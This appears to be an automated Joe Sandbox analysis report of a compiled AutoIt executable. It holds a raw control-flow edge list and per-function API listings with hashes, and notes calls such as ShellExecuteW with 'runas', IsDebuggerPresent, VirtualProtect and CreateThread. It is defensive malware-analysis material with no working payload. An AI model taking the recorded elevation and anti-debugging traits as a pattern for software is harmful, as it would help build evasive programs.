moneypunct 88021->88470 88022->88030 88024->88016 88024->88021 88025->88031 88026 42ad28 88032 42ad4e VariantClear 88026->88032 88037 40a583 moneypunct 88026->88037 88029 40a571 88029->88037 88471 40e270 VariantClear moneypunct 88029->88471 88030->88009 88030->88012 88031->88026 88031->88029 88032->88037 88034 40a650 moneypunct 88034->86865 88035 42ae0e VariantClear 88035->88037 88037->88034 88037->88035 88472 40e270 VariantClear moneypunct 88037->88472 88038->86865 88039->86828 88040->86833 88041->86865 88042->86865 88043->86865 88044->86865 88045->86870 88046->86870 88047->86870 88048->86870 88049->86870 88050->86870 88051->86870 88053 403cdf 88052->88053 88054 408f40 VariantClear 88053->88054 88055 403ce7 88054->88055 88055->86874 88056->86870 88057->86870 88058->86865 88059->86825 88061 408e88 88060->88061 88063 408e94 88060->88063 88062 408f40 VariantClear 88061->88062 88062->88063 88064 45340c 85 API calls 88063->88064 88064->87783 88065->87787 88066->87789 88067->87791 88068->87797 88069->87782 88070->87803 88071->87801 88072->87821 88073->87822 88074->87782 88076 40a7a6 88075->88076 88077 40ae8c 88075->88077 88079 4115d7 52 API calls 88076->88079 88118 41130a 51 API calls __cinit 88077->88118 88115 40a7c6 moneypunct _memmove 88079->88115 88080 40a86d 88081 40abd1 88080->88081 88098 40a878 moneypunct 88080->88098 88123 45e737 90 API calls 3 library calls 88081->88123 88083 401b10 52 API calls 88083->88115 88084 42b791 VariantClear 88084->88115 88085 408e80 VariantClear 88085->88115 88086 4115d7 52 API calls 88086->88115 88087 42ba2d VariantClear 88087->88115 88088 408f40 VariantClear 88088->88098 88089 42b459 VariantClear 88089->88115 88090 40a884 moneypunct 88090->87821 88091 40bc10 53 API calls 88091->88115 88092 408cc0 187 API calls 88092->88115 88094 42b6f6 VariantClear 88094->88115 88095 4530c9 VariantClear 88095->88115 88096 40e270 VariantClear 88096->88115 88097 42bc5b 88097->87821 88098->88088 88098->88090 88099 42bbf5 88124 45e737 90 API calls 3 
library calls 88099->88124 88100 42bb6a 88126 44b92d VariantClear 88100->88126 88101 4115d7 52 API calls 88104 42b5b3 VariantInit VariantCopy 88101->88104 88102 40b5f0 89 API calls 88102->88115 88107 42b5d7 VariantClear 88104->88107 88104->88115 88106 408f40 VariantClear 88106->88115 88107->88115 88110 42bc37 88125 45e737 90 API calls 3 library calls 88110->88125 88113 42bc48 88113->88100 88114 408f40 VariantClear 88113->88114 88114->88100 88115->88080 88115->88081 88115->88083 88115->88084 88115->88085 88115->88086 88115->88087 88115->88089 88115->88091 88115->88092 88115->88094 88115->88095 88115->88096 88115->88099 88115->88100 88115->88101 88115->88102 88115->88106 88115->88110 88119 45308a 53 API calls 88115->88119 88120 470870 52 API calls 88115->88120 88121 457f66 87 API calls __write_nolock 88115->88121 88122 472f47 127 API calls 88115->88122 88116->87809 88117->87812 88118->88115 88119->88115 88120->88115 88121->88115 88122->88115 88123->88100 88124->88100 88125->88113 88126->88097 88127->87829 88128->87832 88129->87848 88130->87846 88131->87837 88132->87852 88133->87883 88134->87852 88135->87885 88136->87852 88137->87885 88138->87869 88139->87885 88140->87870 88141->87885 88142->87885 88143->87864 88145 4289d2 88144->88145 88146 408db3 88144->88146 88174 45e737 90 API calls 3 library calls 88145->88174 88172 40bec0 90 API calls 88146->88172 88149 4289e5 88175 45e737 90 API calls 3 library calls 88149->88175 88150 408e5a 88150->87891 88153 428a05 88155 408f40 VariantClear 88153->88155 88154 408dc9 88154->88149 88154->88150 88154->88153 88156 40a780 194 API calls 88154->88156 88157 408e64 88154->88157 88159 408f40 VariantClear 88154->88159 88173 40ba10 52 API calls 2 library calls 88154->88173 88155->88150 88156->88154 88158 408f40 VariantClear 88157->88158 88158->88150 88159->88154 88161 408f40 VariantClear 88160->88161 88162 403d20 88161->88162 88163 403cd0 VariantClear 88162->88163 88164 403d4d 88163->88164 88176 46e91c 88164->88176 88179 467897 
88164->88179 88223 45e17d 88164->88223 88233 4755ad 88164->88233 88165 403d76 88165->87888 88165->87899 88170->87888 88171->87890 88172->88154 88173->88154 88174->88149 88175->88153 88236 46e785 88176->88236 88178 46e92f 88178->88165 88180 4678bb 88179->88180 88208 467954 88180->88208 88338 45340c 85 API calls 88180->88338 88181 4115d7 52 API calls 88182 467989 88181->88182 88184 467995 88182->88184 88342 40da60 53 API calls 88182->88342 88189 4533eb 85 API calls 88184->88189 88185 4678f6 88187 413a0e __wsplitpath 46 API calls 88185->88187 88188 4678fc 88187->88188 88191 401b10 52 API calls 88188->88191 88190 4679b7 88189->88190 88192 40de40 60 API calls 88190->88192 88193 46790c 88191->88193 88194 4679c3 88192->88194 88339 40d200 52 API calls 2 library calls 88193->88339 88196 4679c7 GetLastError 88194->88196 88197 467a05 88194->88197 88199 403cd0 VariantClear 88196->88199 88200 467a2c 88197->88200 88201 467a4b 88197->88201 88198 467917 88198->88208 88340 4339fa GetFileAttributesW FindFirstFileW FindClose 88198->88340 88202 4679dc 88199->88202 88204 4115d7 52 API calls 88200->88204 88205 4115d7 52 API calls 88201->88205 88206 4679e6 88202->88206 88212 44ae3e CloseHandle 88202->88212 88210 467a31 88204->88210 88211 467a49 88205->88211 88214 408f40 VariantClear 88206->88214 88207 467928 88207->88208 88213 46792f 88207->88213 88208->88181 88209 467964 88208->88209 88209->88165 88343 436299 52 API calls 2 library calls 88210->88343 88218 408f40 VariantClear 88211->88218 88212->88206 88341 4335cd 56 API calls 3 library calls 88213->88341 88217 4679ed 88214->88217 88217->88165 88220 467a88 88218->88220 88219 467939 88219->88208 88221 408f40 VariantClear 88219->88221 88220->88165 88222 467947 88221->88222 88222->88208 88224 45e198 88223->88224 88225 45e19c 88224->88225 88226 45e1b8 88224->88226 88227 408f40 VariantClear 88225->88227 88228 45e1cc 88226->88228 88229 45e1db FindClose 88226->88229 88230 45e1a4 88227->88230 88231 44ae3e CloseHandle 88228->88231 88232 45e1d9 
moneypunct 88228->88232 88229->88232 88230->88165 88231->88232 88232->88165 88344 475077 88233->88344 88235 4755c0 88235->88165 88237 46e7a2 88236->88237 88238 4115d7 52 API calls 88237->88238 88240 46e802 88237->88240 88239 46e7ad 88238->88239 88244 46e7b9 88239->88244 88284 40da60 53 API calls 88239->88284 88241 46e7e5 88240->88241 88245 46e82f 88240->88245 88243 408f40 VariantClear 88241->88243 88247 46e7ea 88243->88247 88285 4533eb 88244->88285 88249 46e8b5 88245->88249 88251 46e845 88245->88251 88247->88178 88277 4680ed 88249->88277 88255 4533eb 85 API calls 88251->88255 88254 46e8bb 88281 443fbe 88254->88281 88264 46e84b 88255->88264 88256 46e7db 88256->88241 88301 44ae3e 88256->88301 88257 46e87a 88304 4689f4 59 API calls 88257->88304 88261 46e883 88263 4013c0 52 API calls 88261->88263 88265 46e88f 88263->88265 88264->88257 88264->88261 88267 40e0a0 52 API calls 88265->88267 88266 408f40 VariantClear 88275 46e881 88266->88275 88268 46e899 88267->88268 88305 40d200 52 API calls 2 library calls 88268->88305 88270 46e911 88270->88178 88271 46e8a5 88306 4689f4 59 API calls 88271->88306 88274 46e903 88276 44ae3e CloseHandle 88274->88276 88275->88270 88307 40da20 88275->88307 88276->88270 88278 468100 88277->88278 88279 4680fa 88277->88279 88278->88254 88311 467ac4 55 API calls 2 library calls 88279->88311 88312 443e36 88281->88312 88283 443fd3 88283->88266 88283->88275 88284->88244 88286 453404 88285->88286 88287 4533f8 88285->88287 88289 40de40 88286->88289 88287->88286 88319 4531b1 85 API calls 5 library calls 88287->88319 88290 40da20 CloseHandle 88289->88290 88291 40de4e 88290->88291 88320 40f110 88291->88320 88294 4264fa 88296 40de84 88329 40e080 SetFilePointerEx SetFilePointerEx 88296->88329 88298 40de8b 88330 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88298->88330 88300 40de90 88300->88245 88300->88256 88302 44ae4b moneypunct 88301->88302 88332 443fdf 88301->88332 88302->88241 88304->88275 88305->88271 88306->88275 88308 40da37 88307->88308 88309 
40da29 88307->88309 88308->88309 88310 40da3c CloseHandle 88308->88310 88309->88274 88310->88274 88311->88278 88315 443e19 88312->88315 88316 443e26 88315->88316 88317 443e32 WriteFile 88315->88317 88318 443db4 SetFilePointerEx SetFilePointerEx 88316->88318 88317->88283 88318->88317 88319->88286 88321 40f125 CreateFileW 88320->88321 88322 42630c 88320->88322 88324 40de74 88321->88324 88323 426311 CreateFileW 88322->88323 88322->88324 88323->88324 88325 426337 88323->88325 88324->88294 88328 40dea0 55 API calls moneypunct 88324->88328 88331 40df90 SetFilePointerEx SetFilePointerEx 88325->88331 88327 426342 88327->88324 88328->88296 88329->88298 88330->88300 88331->88327 88333 40da20 CloseHandle 88332->88333 88334 443feb 88333->88334 88337 4340db CloseHandle moneypunct 88334->88337 88336 444001 88336->88302 88337->88336 88338->88185 88339->88198 88340->88207 88341->88219 88342->88184 88343->88211 88345 4533eb 85 API calls 88344->88345 88346 4750b8 88345->88346 88347 4750ee 88346->88347 88348 475129 88346->88348 88350 408f40 VariantClear 88347->88350 88397 4646e0 88348->88397 88355 4750f5 88350->88355 88351 47515e 88352 475162 88351->88352 88390 47518e 88351->88390 88353 408f40 VariantClear 88352->88353 88384 475169 88353->88384 88354 475357 88356 475365 88354->88356 88357 4754ea 88354->88357 88355->88235 88431 44b3ac 57 API calls 88356->88431 88437 464812 92 API calls 88357->88437 88361 4754fc 88362 475374 88361->88362 88363 475508 88361->88363 88410 430d31 88362->88410 88365 408f40 VariantClear 88363->88365 88364 4533eb 85 API calls 88364->88390 88368 47550f 88365->88368 88368->88384 88369 475388 88417 4577e9 88369->88417 88371 47539e 88425 410cfc 88371->88425 88372 475480 88374 408f40 VariantClear 88372->88374 88374->88384 88382 4754b5 88383 408f40 VariantClear 88382->88383 88383->88384 88384->88235 88390->88354 88390->88364 88390->88372 88390->88382 88390->88390 88429 436299 52 API calls 2 library calls 88390->88429 88430 463ad5 64 API calls __wcsicoll 
88390->88430 88440 4536f7 53 API calls 88397->88440 88399 4646fc 88441 4426cd 59 API calls _wcslen 88399->88441 88401 464711 88403 40bc70 52 API calls 88401->88403 88409 46474b 88401->88409 88404 46472c 88403->88404 88442 461465 52 API calls _memmove 88404->88442 88406 464741 88407 40c600 52 API calls 88406->88407 88407->88409 88408 464793 88408->88351 88409->88408 88443 463ad5 64 API calls __wcsicoll 88409->88443 88411 430db2 88410->88411 88412 430d54 88410->88412 88411->88369 88413 4115d7 52 API calls 88412->88413 88414 430d74 88413->88414 88415 430da9 88414->88415 88416 4115d7 52 API calls 88414->88416 88415->88369 88416->88414 88418 457a84 88417->88418 88419 45780c _strcat moneypunct _wcslen _wcscpy 88417->88419 88418->88371 88419->88418 88420 443006 57 API calls 88419->88420 88422 4135bb 46 API calls _malloc 88419->88422 88423 45340c 85 API calls 88419->88423 88424 40f6f0 54 API calls 88419->88424 88444 44b3ac 57 API calls 88419->88444 88420->88419 88422->88419 88423->88419 88424->88419 88427 410d11 88425->88427 88426 410da9 VirtualProtect 88427->88426 88429->88390 88430->88390 88431->88362 88437->88361 88440->88399 88441->88401 88442->88406 88443->88408 88444->88419 88445->87907 88446->88004 88447->87922 88448->87970 88449->88034 88450->87970 88451->87970 88452->87940 88453->87967 88454->87932 88455->87936 88456->87941 88457->88002 88458->88002 88459->88002 88460->87958 88461->87978 88462->87960 88463->87991 88464->88011 88465->88011 88466->88004 88467->88018 88468->88030 88469->88024 88470->88031 88471->88037 88472->88037 88473->87978 88474->87927 88475 42d154 88479 480a8d 88475->88479 88477 42d161 88478 480a8d 194 API calls 88477->88478 88478->88477 88480 480ae4 88479->88480 88481 480b26 88479->88481 88483 480aeb 88480->88483 88484 480b15 88480->88484 88482 40bc70 52 API calls 88481->88482 88494 480b2e 88482->88494 88486 480aee 88483->88486 88487 480b04 88483->88487 88512 4805bf 194 API calls 88484->88512 88486->88481 88489 480af3 88486->88489 88511 47fea2 
194 API calls __itow_s 88487->88511 88510 47f135 194 API calls 88489->88510 88491 40e0a0 52 API calls 88491->88494 88493 408f40 VariantClear 88496 481156 88493->88496 88494->88491 88495 480aff 88494->88495 88499 40e710 53 API calls 88494->88499 88500 401980 53 API calls 88494->88500 88502 40c2c0 52 API calls 88494->88502 88503 480ff5 88494->88503 88504 408e80 VariantClear 88494->88504 88505 40a780 194 API calls 88494->88505 88513 45377f 52 API calls 88494->88513 88514 45e951 53 API calls 88494->88514 88515 40e830 53 API calls 88494->88515 88516 47925f 53 API calls 88494->88516 88517 47fcff 194 API calls 88494->88517 88495->88493 88497 408f40 VariantClear 88496->88497 88498 48115e 88497->88498 88498->88477 88499->88494 88500->88494 88502->88494 88518 45e737 90 API calls 3 library calls 88503->88518 88504->88494 88505->88494 88510->88495 88511->88495 88512->88495 88513->88494 88514->88494 88515->88494 88516->88494 88517->88494 88518->88495 88519 42b14b 88526 40bc10 88519->88526 88521 42b159 88522 4096a0 331 API calls 88521->88522 88523 42b177 88522->88523 88537 44b92d VariantClear 88523->88537 88525 42bc5b 88527 40bc24 88526->88527 88528 40bc17 88526->88528 88530 40bc2a 88527->88530 88531 40bc3c 88527->88531 88529 408e80 VariantClear 88528->88529 88532 40bc1f 88529->88532 88533 408e80 VariantClear 88530->88533 88534 4115d7 52 API calls 88531->88534 88532->88521 88535 40bc33 88533->88535 88536 40bc43 88534->88536 88535->88521 88536->88521 88537->88525 88538 425b2b 88543 40f000 88538->88543 88542 425b3a 88544 4115d7 52 API calls 88543->88544 88545 40f007 88544->88545 88546 4276ea 88545->88546 88552 40f030 88545->88552 88551 41130a 51 API calls __cinit 88551->88542 88553 40f039 88552->88553 88555 40f01a 88552->88555 88582 41130a 51 API calls __cinit 88553->88582 88556 40e500 88555->88556 88557 40bc70 52 API calls 88556->88557 88558 40e515 GetVersionExW 88557->88558 88559 402160 52 API calls 88558->88559 88560 40e557 88559->88560 88583 40e660 88560->88583 88567 427674 
88570 4276c6 GetSystemInfo 88567->88570 88568 40e5e0 88572 4276d5 GetSystemInfo 88568->88572 88597 40efd0 88568->88597 88569 40e5cd GetCurrentProcess 88604 40ef20 LoadLibraryA GetProcAddress 88569->88604 88570->88572 88575 40e629 88601 40ef90 88575->88601 88578 40e641 FreeLibrary 88579 40e644 88578->88579 88580 40e653 FreeLibrary 88579->88580 88581 40e656 88579->88581 88580->88581 88581->88551 88582->88555 88584 40e667 88583->88584 88585 42761d 88584->88585 88586 40c600 52 API calls 88584->88586 88587 40e55c 88586->88587 88588 40e680 88587->88588 88589 40e687 88588->88589 88590 427616 88589->88590 88591 40c600 52 API calls 88589->88591 88592 40e566 88591->88592 88592->88567 88593 40ef60 88592->88593 88594 40e5c8 88593->88594 88595 40ef66 LoadLibraryA 88593->88595 88594->88568 88594->88569 88595->88594 88596 40ef77 GetProcAddress 88595->88596 88596->88594 88598 40e620 88597->88598 88599 40efd6 LoadLibraryA 88597->88599 88598->88570 88598->88575 88599->88598 88600 40efe7 GetProcAddress 88599->88600 88600->88598 88605 40efb0 LoadLibraryA GetProcAddress 88601->88605 88603 40e632 GetNativeSystemInfo 88603->88578 88603->88579 88604->88568 88605->88603 88606 3fc14f0 88620 3fbf140 88606->88620 88608 3fc15ae 88623 3fc13e0 88608->88623 88626 3fc25e0 GetPEB 88620->88626 88622 3fbf7cb 88622->88608 88624 3fc13e9 Sleep 88623->88624 88625 3fc13f7 88624->88625 88627 3fc260a 88626->88627 88627->88622 88628 425b5e 88633 40c7f0 88628->88633 88632 425b6d 88668 40db10 52 API calls 88633->88668 88635 40c82a 88669 410ab0 6 API calls 88635->88669 88637 40c86d 88638 40bc70 52 API calls 88637->88638 88639 40c877 88638->88639 88640 40bc70 52 API calls 88639->88640 88641 40c881 88640->88641 88642 40bc70 52 API calls 88641->88642 88643 40c88b 88642->88643 88644 40bc70 52 API calls 88643->88644 88645 40c8d1 88644->88645 88646 40bc70 52 API calls 88645->88646 88647 40c991 88646->88647 88670 40d2c0 52 API calls 88647->88670 88649 40c99b 88671 40d0d0 53 API calls 88649->88671 88651 40c9c1 88652 
40bc70 52 API calls 88651->88652 88653 40c9cb 88652->88653 88672 40e310 53 API calls 88653->88672 88655 40ca28 88656 408f40 VariantClear 88655->88656 88657 40ca30 88656->88657 88658 408f40 VariantClear 88657->88658 88659 40ca38 GetStdHandle 88658->88659 88660 429630 88659->88660 88661 40ca87 88659->88661 88660->88661 88662 429639 88660->88662 88667 41130a 51 API calls __cinit 88661->88667 88673 4432c0 57 API calls 88662->88673 88664 429641 88674 44b6ab CreateThread 88664->88674 88666 42964f CloseHandle 88666->88661 88667->88632 88668->88635 88669->88637 88670->88649 88671->88651 88672->88655 88673->88664 88674->88666 88675 44b5cb 58 API calls 88674->88675 88676 425b6f 88681 40dc90 88676->88681 88680 425b7e 88682 40bc70 52 API calls 88681->88682 88683 40dd03 88682->88683 88689 40f210 88683->88689 88686 40dd96 88687 40ddb7 88686->88687 88692 40dc00 52 API calls 2 library calls 88686->88692 88688 41130a 51 API calls __cinit 88687->88688 88688->88680 88693 40f250 RegOpenKeyExW 88689->88693 88691 40f230 88691->88686 88692->88686 88694 425e17 88693->88694 88695 40f275 RegQueryValueExW 88693->88695 88694->88691 88696 40f2c3 RegCloseKey 88695->88696 88697 40f298 88695->88697 88696->88691 88698 40f2a9 RegCloseKey 88697->88698 88699 425e1d 88697->88699 88698->88691
                                                APIs
                                                • _wcslen.LIBCMT ref: 004096C1
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 0040970C
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                • _memmove.LIBCMT ref: 00409D96
                                                • _memmove.LIBCMT ref: 0040A6C4
                                                • _memmove.LIBCMT ref: 004297E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                • String ID:
                                                • API String ID: 2383988440-0
                                                • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Strings
                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                • API String ID: 2495805114-3383388033
                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                Control-flow Graph

                                                Control-flow graph of function 0040E500 (legend: executed / not executed blocks; rendered graph not reproduced, raw edge list omitted)
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                • String ID: 0SH
                                                • API String ID: 3363477735-851180471
                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                APIs
                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: IsThemeActive$uxtheme.dll
                                                • API String ID: 2574300362-3542929980
                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                • API String ID: 1762048999-758534266
